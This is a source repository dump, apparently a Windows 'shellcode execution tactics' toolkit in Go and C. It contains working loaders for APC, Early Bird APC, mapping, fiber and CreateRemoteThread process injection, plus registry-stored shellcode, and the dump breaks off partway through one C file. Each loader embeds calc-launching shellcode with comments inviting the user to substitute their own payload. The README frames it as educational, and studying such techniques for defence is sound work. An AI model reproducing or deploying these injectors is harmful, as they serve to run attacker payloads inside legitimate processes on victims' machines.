├── APC_Injection └── APC_Injection.go ├── Early_Bird_APC_Injection └── Early_Bird_APC_Injection.go ├── LICENSE ├── Local_Mapping_Injection └── Local_Mapping_Injection.go ├── Local_Payload_Execution └── Local_Payload_Execution.go ├── Payload_Execution_Fibers ├── Payload_Execution_Fibers.go └── payload_exec_fibers.c ├── Payload_Placement ├── Payload_Placement.go └── Payload_Placement_Wrapper.c ├── Process_Injection_Shellcode ├── ProcInjMapper.c ├── ProcInjMapper.h ├── Process_Injection_Shellcode.go └── build.bat ├── README.md ├── Registry_Shellcode ├── Reg_Wrapper.c ├── Registry_Shellcode.go └── build.bat ├── Remote_Function_Stomping_Injection ├── RemoteFuncMapper.c ├── RemoteFuncMapper.h ├── Remote_Function_Stomping_Injection.go └── build.bat ├── Remote_Mapping_Injection ├── Remote_Mapper.c └── Remote_Mapping_Injection.go ├── Remote_Thread_Hijacking ├── Remote_Thread_Hijacking.go └── remote_thread_hijacking.c └── Threadless_Injection ├── Threadless_Injection.go ├── build.bat ├── threadless_injection_wrapper.c ├── threadless_injection_wrapper.def └── threadless_injection_wrapper.h /APC_Injection/APC_Injection.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | const ( 9 | // it can be like 0x2000 but itook this from uhh rubyredops cuz i was lazy to find it lol 10 | MEM_COMMIT = 0x00001000 11 | MEM_RESERVE = 0x00002000 12 | ) 13 | // start calc.exe (Will start calculator.exe), example shellcode, replace with yours 14 | var shellcode = []byte{ 15 | 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 16 | 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 17 | 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 18 | 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 19 | 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 20 | 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 21 | 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, 22 | } 23 | 24 | func main() { 25 | Kernel32 := syscall.NewLazyDLL("kernel32.dll") 26 | VirtualAllocation := Kernel32.NewProc("VirtualAlloc") 27 | VirtualProtect := Kernel32.NewProc("VirtualProtect") 28 | CreateThread := Kernel32.NewProc("CreateThread") 29 | WaitForSingleObject := Kernel32.NewProc("WaitForSingleObject") 30 | 31 | addr, _, err := VirtualAllocation.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, syscall.PAGE_READWRITE) 32 | if addr == 0 { 33 | fmt.Printf("[!] VirtualAlloc Failed With Error: %v\n", err) 34 | return 35 | } 36 | //copy is like memcpy btw or thats what i think cuz its similar cant lie :shrug: 37 | copy((*[1 << 30]byte)(unsafe.Pointer(addr))[:], shellcode) 38 | 39 | var oldprotect uintptr 40 | ret, _, err := VirtualProtect.Call(addr, uintptr(len(shellcode)), syscall.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldprotect))) 41 | if ret == 0 { 42 | fmt.Printf("[!] VirtualProtect Failed With Error: %v\n", err) 43 | return 44 | } 45 | 46 | thread, _, err := CreateThread.Call(0, 0, addr, 0, 0, 0) 47 | if thread == 0 { 48 | fmt.Printf("[!] CreateThread Failed With Error: %v\n", err) 49 | return 50 | } 51 | 52 | WaitForSingleObject.Call(thread, syscall.INFINITE) 53 | } 54 | -------------------------------------------------------------------------------- /Early_Bird_APC_Injection/Early_Bird_APC_Injection.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 11 | ntdll = syscall.NewLazyDLL("ntdll.dll") 12 | VirtualAllocEx = kernel32.NewProc("VirtualAllocEx") 13 | VirtualProtectEx = kernel32.NewProc("VirtualProtectEx") 14 | WriteProcessMemory = kernel32.NewProc("WriteProcessMemory") 15 | CreateProcessA = kernel32.NewProc("CreateProcessA") 16 | CreateRemoteThread = kernel32.NewProc("CreateRemoteThread") 17 | QueueUserAPC = kernel32.NewProc("QueueUserAPC") 18 | DebugActiveProcessStop = kernel32.NewProc("DebugActiveProcessStop") 19 | CloseHandle = kernel32.NewProc("CloseHandle") 20 | SleepEx = kernel32.NewProc("SleepEx") 21 | 22 | Startinf syscall.StartupInfo 23 | ProcInfo syscall.ProcessInformation 24 | ) 25 | 26 | const ( 27 | MEM_COMMIT = 0x1000 28 | MEM_RESERVE = 0x2000 29 | PAGE_READWRITE = 0x04 30 | PAGE_EXECUTE_READWRITE = 0x40 31 | DEBUG_PROCESS = 0x00000001 32 | INFINITE = 0xFFFFFFFF 33 | ) 34 | 35 | // Shellcode to start calc.exe 36 | var ShellCode = []byte{ 37 | 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 38 | 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 39 | 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 40 | 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 41 | 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 42 | 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 43 | 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, 44 | } 45 | 46 | func main() { 47 | /* 48 | inject malicious code into legitimate processes. inserting malicious code into a process in its early stages 49 | */ 50 | cl := "C:\\Windows\\System32\\calc.exe" 51 | 52 | ret, _, err := CreateProcessA.Call( 53 | 0, 54 | uintptr(unsafe.Pointer(syscall.StringBytePtr(cl))), 55 | 0, 56 | 0, 57 | 0, 58 | DEBUG_PROCESS, 59 | 0, 60 | 0, 61 | uintptr(unsafe.Pointer(&Startinf)), 62 | uintptr(unsafe.Pointer(&ProcInfo)), 63 | ) 64 | if ret == 0 { 65 | panic(fmt.Sprintf("CreateProcessA failed: %v", err)) 66 | } 67 | 68 | hProcess := ProcInfo.Process 69 | hThread := ProcInfo.Thread 70 | 71 | addr, _, err := VirtualAllocEx.Call( 72 | uintptr(hProcess), 73 | 0, 74 | uintptr(len(ShellCode)), 75 | MEM_COMMIT|MEM_RESERVE, 76 | PAGE_READWRITE, 77 | ) 78 | if addr == 0 { 79 | panic(fmt.Sprintf("VirtualAllocEx failed: %v", err)) 80 | } 81 | 82 | _, _, err = WriteProcessMemory.Call( 83 | uintptr(hProcess), 84 | addr, 85 | uintptr(unsafe.Pointer(&ShellCode[0])), 86 | uintptr(len(ShellCode)), 87 | 0, 88 | ) 89 | if ret == 0 { 90 | panic(fmt.Sprintf("WriteProcessMemory failed: %v", err)) 91 | } 92 | 93 | var ldprotect uint32 94 | ret, _, err = VirtualProtectEx.Call( 95 | uintptr(hProcess), 96 | addr, 97 | uintptr(len(ShellCode)), 98 | PAGE_EXECUTE_READWRITE, 99 | uintptr(unsafe.Pointer(&ldprotect)), 100 | ) 101 | if ret == 0 { 102 | panic(fmt.Sprintf("VirtualProtectEx failed: %v", err)) 103 | } 104 | 105 | ret, _, err = QueueUserAPC.Call( 106 | addr, 107 | uintptr(hThread), 108 | 0, 109 | ) 110 | if ret == 0 { 111 | panic(fmt.Sprintf("QueueUserAPC failed: %v", err)) 112 | } 113 | 114 | ret, _, err = DebugActiveProcessStop.Call(uintptr(ProcInfo.ProcessId)) 115 | if ret == 0 { 116 | panic(fmt.Sprintf("DebugActiveProcessStop failed: %v", err)) 117 | } 118 | 119 | ret, _, err = CloseHandle.Call(uintptr(hProcess)) 120 | if ret == 0 { 121 | panic(fmt.Sprintf("CloseHandle (process) failed: %v", err)) 122 | } 123 | 124 | ret, _, err = CloseHandle.Call(uintptr(hThread)) 125 | if ret == 0 { 126 | panic(fmt.Sprintf("CloseHandle (thread) failed: %v", err)) 127 | } 128 | } 129 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 EvilBytecode 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to use the Software for educational and authorized cybersecurity research purposes only, subject to the following conditions: 7 | 8 | The above copyright notice, this permission notice, and the following disclaimer shall be included in all copies or substantial portions of the Software. 9 | 10 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 11 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS (INCLUDING EvilBytecode) BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, 12 | WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE, COPYING, DOWNLOADING, OR OTHER DEALINGS IN THE SOFTWARE. 13 | 14 | DISCLAIMER: I, EvilBytecode, release this project strictly for educational, academic, and authorized cybersecurity research purposes. 15 | By accessing, downloading, copying, using, or modifying this software, you agree to these terms. 16 | You must obtain explicit written permission from system owners before conducting any testing using this software. 17 | Unauthorized use, distribution, or deployment of this software against any third party, device, network, or system without prior consent is strictly forbidden and illegal. 18 | I, EvilBytecode, disclaim all responsibility, liability, or consequences arising from any misuse, illegal activities, damages, or losses resulting from this software. -------------------------------------------------------------------------------- /Local_Mapping_Injection/Local_Mapping_Injection.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "syscall" 6 | "unsafe" 7 | ) 8 | 9 | var ( 10 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 11 | CreateFileMappingW = kernel32.NewProc("CreateFileMappingW") 12 | MapViewOfFile = kernel32.NewProc("MapViewOfFile") 13 | CreateThread = kernel32.NewProc("CreateThread") 14 | WaitForSingleObject = kernel32.NewProc("WaitForSingleObject") 15 | CloseHandle = kernel32.NewProc("CloseHandle") 16 | ) 17 | 18 | func main() { 19 | // start calc.exe 20 | shellcode := []byte{ 21 | 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 22 | 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 23 | 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 24 | 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 25 | 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 26 | 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 27 | 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, 28 | } 29 | 30 | fmt.Println("[+] Creating a mapping file") 31 | hfile, _, err := CreateFileMappingW.Call( 32 | uintptr(0xFFFFFFFFFFFFFFFF), // INVALID_HANDLE_VALUE 33 | 0, 34 | syscall.PAGE_EXECUTE_READWRITE, 35 | 0, 36 | uintptr(len(shellcode)), 37 | 0, 38 | ) 39 | if hfile == 0 { 40 | panic(fmt.Sprintf("[!] CreateFileMappingW Failed With Error: %v", err)) 41 | } 42 | 43 | fmt.Println("[+] Mapping the file object") 44 | mapaddr, _, err := MapViewOfFile.Call( 45 | hfile, 46 | syscall.FILE_MAP_WRITE|syscall.FILE_MAP_EXECUTE, 47 | 0, 48 | 0, 49 | uintptr(len(shellcode)), 50 | ) 51 | if mapaddr == 0 { 52 | panic(fmt.Sprintf("[!] MapViewOfFile Failed With Error: %v", err)) 53 | } 54 | 55 | fmt.Println("[+] Copying shellcode to mapped memory") 56 | copy((*[276]byte)(unsafe.Pointer(mapaddr))[:], shellcode) 57 | 58 | fmt.Println("[+] Creating a thread") 59 | hthread, _, err := CreateThread.Call( 60 | 0, 61 | 0, 62 | mapaddr, 63 | 0, 64 | 0, 65 | 0, 66 | ) 67 | if hthread == 0 { 68 | panic(fmt.Sprintf("[!] CreateThread Failed With Error: %v", err)) 69 | } 70 | 71 | fmt.Println("[+] Thread Executed!!") 72 | WaitForSingleObject.Call(hthread, syscall.INFINITE) 73 | CloseHandle.Call(hthread) 74 | } 75 | -------------------------------------------------------------------------------- /Local_Payload_Execution/Local_Payload_Execution.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "unsafe" 6 | "syscall" 7 | ) 8 | 9 | var ( 10 | kernel32 = syscall.NewLazyDLL("kernel32.dll") 11 | virtualalloc = kernel32.NewProc("VirtualAlloc") 12 | virtualprotect = kernel32.NewProc("VirtualProtect") 13 | createthread = kernel32.NewProc("CreateThread") 14 | waitforsingleobject = kernel32.NewProc("WaitForSingleObject") 15 | ) 16 | 17 | const ( 18 | memCommit = 0x00001000 19 | memReserve = 0x00002000 20 | pageReadWrite = 0x04 21 | pageExecuteReadWrite = 0x40 22 | infinite = 0xFFFFFFFF 23 | ) 24 | 25 | func main() { 26 | shellcode := []byte{ 27 | 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 28 | 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 29 | 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 30 | 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 31 | 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 32 | 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 33 | 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, 34 | } 35 | 36 | fmt.Println("[+] Memory Allocation Being Performed") 37 | addr, _, err := virtualalloc.Call(0, uintptr(len(shellcode)), memCommit|memReserve, pageReadWrite) 38 | if addr == 0 { 39 | panic(fmt.Sprintf("[!] VirtualAlloc failed: %v", err)) 40 | } 41 | 42 | fmt.Println("[+] Copying Shellcode To Target Memory") 43 | for i, v := range shellcode { 44 | *(*byte)(unsafe.Pointer(addr + uintptr(i))) = v 45 | } 46 | 47 | fmt.Println("[+] Changing Page Permissions") 48 | var oldProtect uint32 49 | _, _, err = virtualprotect.Call(addr, uintptr(len(shellcode)), pageExecuteReadWrite, uintptr(unsafe.Pointer(&oldProtect))) 50 | if err != nil && err.(syscall.Errno) != 0 { 51 | panic(fmt.Sprintf("[!] VirtualProtect failed: %v", err)) 52 | } 53 | 54 | fmt.Println("[+] Thread Being Created") 55 | thread, _, err := createthread.Call(0, 0, addr, 0, 0, 0) 56 | if thread == 0 { 57 | panic(fmt.Sprintf("[!] CreateThread failed: %v", err)) 58 | } 59 | 60 | fmt.Println("[+] Shellcode Executed!") 61 | waitforsingleobject.Call(thread, infinite) 62 | } 63 | -------------------------------------------------------------------------------- /Payload_Execution_Fibers/Payload_Execution_Fibers.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | /* 4 | #include "payload_exec_fibers.c" 5 | */ 6 | import "C" 7 | import ( 8 | "fmt" 9 | "unsafe" 10 | ) 11 | // Start Calc.exe 12 | var shellcode = []byte{ 13 | 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 14 | 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 15 | 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 16 | 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 17 | 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 18 | 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 19 | 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, 20 | } 21 | 22 | func main() { 23 | C.ExecSC((*C.uchar)(unsafe.Pointer(&shellcode[0])), C.size_t(len(shellcode))) 24 | fmt.Println("[+] Shellcode Executed!") 25 | } 26 | -------------------------------------------------------------------------------- /Payload_Execution_Fibers/payload_exec_fibers.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void ExecSC(const unsigned char* shellcode, size_t length) { 4 | LPVOID allocmem = VirtualAlloc(NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 5 | if (allocmem == NULL) { 6 | ExitProcess(GetLastError()); 7 | } 8 | memcpy(allocmem, shellcode, length); 9 | DWORD oldProtect; 10 | if (!VirtualProtect(allocmem, length, PAGE_EXECUTE_READ, &oldProtect)) { 11 | VirtualFree(allocmem, 0, MEM_RELEASE); 12 | ExitProcess(GetLastError()); 13 | } 14 | HANDLE fiber = CreateFiber(0, (LPFIBER_START_ROUTINE)allocmem, NULL); 15 | if (fiber == NULL) { 16 | VirtualFree(allocmem, 0, MEM_RELEASE); 17 | ExitProcess(GetLastError()); 18 | } 19 | ConvertThreadToFiber(NULL); 20 | SwitchToFiber(fiber); 21 | DeleteFiber(fiber); 22 | VirtualFree(allocmem, 0, MEM_RELEASE); 23 | } -------------------------------------------------------------------------------- /Payload_Placement/Payload_Placement.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | /* 4 | #include "Payload_Placement_Wrapper.c" 5 | */ 6 | import "C" 7 | import ( 8 | "fmt" 9 | "unsafe" 10 | ) 11 | 12 | // start calc.exe 13 | var shellcode = []byte{ 14 | 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 15 | 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 16 | 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 17 | 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 18 | 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 19 | 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 20 | 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, 21 | } 22 | 23 | func main() { 24 | C.ExecSC((*C.uchar)(unsafe.Pointer(&shellcode[0])), C.size_t(len(shellcode))) 25 | fmt.Println("[+] Shellcode Executed!") 26 | } 27 | -------------------------------------------------------------------------------- /Payload_Placement/Payload_Placement_Wrapper.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | typedef void (*shellcode_func)(); 5 | 6 | void ExecSC(const unsigned char* shellcode, size_t length) { 7 | LPVOID allocmem = VirtualAlloc(NULL, length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 8 | if (allocmem == NULL) { 9 | ExitProcess(GetLastError()); 10 | } 11 | memcpy(allocmem, shellcode, length); 12 | DWORD olprotec; 13 | if (!VirtualProtect(allocmem, length, PAGE_EXECUTE_READ, &olprotec)) { 14 | VirtualFree(allocmem, 0, MEM_RELEASE); 15 | ExitProcess(GetLastError()); 16 | } 17 | shellcode_func func = (shellcode_func)allocmem; 18 | func(); 19 | VirtualFree(allocmem, 0, MEM_RELEASE); 20 | } -------------------------------------------------------------------------------- /Process_Injection_Shellcode/ProcInjMapper.c: -------------------------------------------------------------------------------- 1 | #include "ProcInjMapper.h" 2 | #include 3 | #include 4 | 5 | DWORD find_process(const char *name) { 6 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); 7 | if (hSnapshot == INVALID_HANDLE_VALUE) { 8 | return 0; 9 | } 10 | 11 | PROCESSENTRY32 pe; 12 | pe.dwSize = sizeof(PROCESSENTRY32); 13 | 14 | if (!Process32First(hSnapshot, &pe)) { 15 | CloseHandle(hSnapshot); 16 | return 0; 17 | } 18 | 19 | do { 20 | if (strcmp(pe.szExeFile, name) == 0) { 21 | CloseHandle(hSnapshot); 22 | return pe.th32ProcessID; 23 | } 24 | } while (Process32Next(hSnapshot, &pe)); 25 | 26 | CloseHandle(hSnapshot); 27 | return 0; 28 | } 29 | 30 | BOOL inject_shellcode(DWORD pid, const unsigned char *buf, size_t len) { 31 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); 32 | if (hProcess == NULL) { 33 | return FALSE; 34 | } 35 | 36 | LPVOID addr = VirtualAllocEx(hProcess, NULL, len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READ); 37 | if (addr == NULL) { 38 | CloseHandle(hProcess); 39 | return FALSE; 40 | } 41 | 42 | if (!WriteProcessMemory(hProcess, addr, buf, len, NULL)) { 43 | CloseHandle(hProcess); 44 | return FALSE; 45 | } 46 | 47 | HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)addr, NULL, 0, NULL); 48 | if (hThread == NULL) { 49 | CloseHandle(hProcess); 50 | return FALSE; 51 | } 52 | 53 | WaitForSingleObject(hThread, INFINITE); 54 | CloseHandle(hThread); 55 | CloseHandle(hProcess); 56 | return TRUE; 57 | } 58 | -------------------------------------------------------------------------------- /Process_Injection_Shellcode/ProcInjMapper.h: -------------------------------------------------------------------------------- 1 | #ifndef PROCINJMAPPER_H 2 | #define PROCINJMAPPER_H 3 | 4 | #include 5 | 6 | DWORD find_process(const char *name); 7 | BOOL inject_shellcode(DWORD pid, const unsigned char *buf, size_t len); 8 | 9 | #endif // PROCINJMAPPER_H 10 | -------------------------------------------------------------------------------- /Process_Injection_Shellcode/Process_Injection_Shellcode.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | /* 4 | #cgo LDFLAGS: -lpsapi 5 | #include "ProcInjMapper.h" 6 | */ 7 | import "C" 8 | import ( 9 | "fmt" 10 | "unsafe" 11 | ) 12 | 13 | func main() { 14 | shellcode := []byte{ 15 | 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 16 | 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, 17 | 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, 18 | 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, 19 | 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, 20 | 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, 21 | 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, 22 | } 23 | 24 | procname := C.CString("notepad.exe") 25 | defer C.free(unsafe.Pointer(procname)) 26 | 27 | pid := C.find_process(procname) 28 | if pid == 0 { 29 | fmt.Println("[!] Process not found") 30 | return 31 | } 32 | 33 | scess := C.inject_shellcode(pid, (*C.uchar)(&shellcode[0]), C.size_t(len(shellcode))) 34 | if scess == C.FALSE { 35 | fmt.Println("[!] Injection failed") 36 | } else { 37 | fmt.Println("[+] Injection successful") 38 | } 39 | } 40 | -------------------------------------------------------------------------------- /Process_Injection_Shellcode/build.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | go build -o ProcInj.exe 3 | exit -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Evilbytecode Shellcode Execution Tactics 2 | 3 | This repository contains various projects that demonstrate advanced techniques for executing shellcode and performing memory manipulation. 4 | 5 | ## Features 6 | 7 | - **APC Injection** 8 | Exploits the Asynchronous Procedure Call (APC) technique to execute malicious code within target processes. 9 | 10 | - **Early Bird APC Injection** 11 | A variation of APC Injection focusing on executing code before the main process starts. 12 | 13 | - **Local Mapping Injection** 14 | Demonstrates malicious code injection via memory mapping into local processes. 15 | 16 | - **Local Payload Execution** 17 | Addresses the direct execution of malicious payloads in a system's local environment. 18 | 19 | - **Payload Execution Fibers** 20 | Demonstrates running shellcode using Fibers, a type of lightweight thread. 21 | 22 | - **Payload Placement** 23 | Shows how to store shellcode in the .text section of a process and execute it. 24 | 25 | - **Process Injection (Shellcode)** 26 | Exploits shellcode injection directly into running processes to control or execute malicious tasks. 27 | 28 | - **Registry Shellcode** 29 | Demonstrates writing and reading shellcode to/from the Windows Registry. 30 | 31 | - **Remote Function Stomping Injection** 32 | Exploits the substitution of functions in remote systems to carry out malicious activities. 33 | 34 | - **Remote Mapping Injection** 35 | Demonstrates malicious code injection via memory mapping into remote processes. 36 | 37 | - **Remote Thread Hijacking** 38 | Focuses on hijacking threads in remote system processes to execute malicious code. 39 | 40 | - **Threadless Injection** 41 | Demonstrates threadless injection using Go & C, where shellcode is injected without creating a new thread. 42 | 43 | ## Contributing 44 | 45 | Contributions are welcome! If you have improvements or additional techniques to add, please fork the repository and submit a pull request. Ensure your code follows the project's coding standards and includes relevant documentation. 46 | 47 | ## License 48 | 49 | This repository is licensed under the MIT License. See the [LICENSE](LICENSE) file for more details. 50 | 51 | ## Disclaimer 52 | 53 | This repository is intended for educational purposes only. The techniques demonstrated here are for understanding security vulnerabilities and enhancing defensive measures. Unauthorized use of these techniques may have legal consequences. 54 | 55 | --- 56 | -------------------------------------------------------------------------------- /Registry_Shellcode/Reg_Wrapper.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void writereg(BYTE *buf, DWORD size) { 6 | HKEY hkey; 7 | LONG status = RegOpenKeyExA( 8 | HKEY_CURRENT_USER, 9 | "Control Panel", 10 | 0, 11 | KEY_SET_VALUE, 12 | &hkey 13 | ); 14 | if (status != ERROR_SUCCESS) { 15 | printf("[!] RegOpenKeyExA Failed With Error: %ld\n", status); 16 | return; 17 | } 18 | 19 | status = RegSetValueExA( 20 | hkey, 21 | "Evilbytecode", 22 | 0, 23 | REG_BINARY, 24 | buf, 25 | size 26 | ); 27 | if (status != ERROR_SUCCESS) { 28 | printf("[!] RegSetValueExA Failed With Error: %ld\n", status); 29 | } else { 30 | printf("[+] RegSetValueExA Succeeded\n"); 31 | 